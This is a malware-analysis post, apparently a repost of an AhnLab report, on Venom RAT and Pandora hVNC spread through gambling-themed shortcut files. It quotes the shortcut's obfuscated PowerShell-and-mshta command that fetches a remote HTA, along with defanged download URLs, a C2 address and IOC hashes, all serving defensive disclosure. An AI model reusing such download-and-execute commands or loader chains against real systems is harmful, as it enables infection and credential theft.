Distribution of RAT Malware Disguised as a Gambling-related File

by Prapattimynk, Wednesday, 7 February 2024 (3 weeks ago)
Distribution of RAT Malware Disguised as a Gambling-related File

AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. Like the distribution method of VenomRAT introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and it downloads the RAT directly from HTA.

Figure 1. Operation process

The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script.

  • PowerShell command
    C:WindowsSystem32WindowsPowerShellv1.0powershell.exe . $env:C:W*S*2m*h?a.*  ‘hxxp://193.***.***[.]253:7287/2.hta.hta’

    Figure 2. LNK properties

The malicious URLs in the confirmed shortcut file are as follows:

  • hxxp://193.***.***[.]253:7287/2.hta.hta
  • hxxp://193.***.***[.]253:7287/.hta
  • hxxp://85.209.176[.]158:7287/6.hta

hxxp://193.***.***[.]253:7287/2.hta.hta contains VBS codes as it has in the past. Inside the VBS code, there are obfuscated legitimate document files and PowerShell commands that download the malicious RAT. The decoded PowerShell command is shown below.

Figure 3. Decoded PowerShell command

When the command shown in Figure 3 is executed, Excel file is downloaded from hxxp://193.***.***[.]253:7287/percent.xlsm, and saved as percent.xlsm inside the %APPDATA% folder. The downloaded Excel file (percent.xlsm) contains betting methods shown in Figure 4, hinting that the threat actor is targeting users interested in gambling.

Figure 4. Content within percent.xlsm

Afterward, the command downloads an additional executable from hxxp://193.***.***[.]253:7287/darkss.exe and saves it as darkss.exe inside the %APPDATA% folder. The downloaded executable is Venom RAT malware, which not only leaks keylogging and user credentials, but also performs various malicious activities by receiving commands from the threat actor.

Figure 5. Part of darkss.exe (Venom RAT) code

  • C2 : 193.***.***[.]253:4449

Inside the previously mentioned URL (193.***.***[.]253:7287, 85.209.176[.]158:7287), other various malicious files exist in addition to those already mentioned in this post, such as HTA scripts, decoy document files, and malicious executables.

Figure 6. List of additional files found in the malicious URL

The additional decoy document files that have been found also contained information about gambling websites as well as personal information of some users.

Figure 7. Additional decoy document file 1 (2023_12.xlsx)

Figure 8. Additional decoy document file 2 (testDB.xlsx)

Darksoft111.exe and Pandora_cryptered.exe shown in Figure 6 are respectively Venom RAT and Pandora hVNC malware. Users are advised to take extra caution as the threat actor is using various types of RAT malware.

Figure 9. Part of Pandora_cryptered.exe (Pandora hVNC) code

[File Detection]
Downloader/HTA.Agent (2024.01.29.03)
Trojan/Win.PWSX-gen (2024.01.12.03)
Trojan/Win.Krypt (2024.01.29.03)

[Behavior Detection]

[IOC Info]
ac281f9830ee7f0a142cecc76fe59da9 (LNK)
20a88382040e47209e50652599d92440 (LNK)
cfe22644d656ca2fbdc44aaecb37fab9 (LNK)
15e98eb4a6fd73ff10cac751d467375e (HTA)
97e5b88cf1a452393c790ff84f08e3be (HTA)
9aa64f465c28e4d9af91af2fe2d29e5e (HTA)
04dc064b9e6fbc1466f5844c2dd422a4 (EXE)
a69f529f5fa414aba6af1f063ec7ce32 (EXE)
0bb437212ee1af602f7a34670825ff43 (EXE)

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.


Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.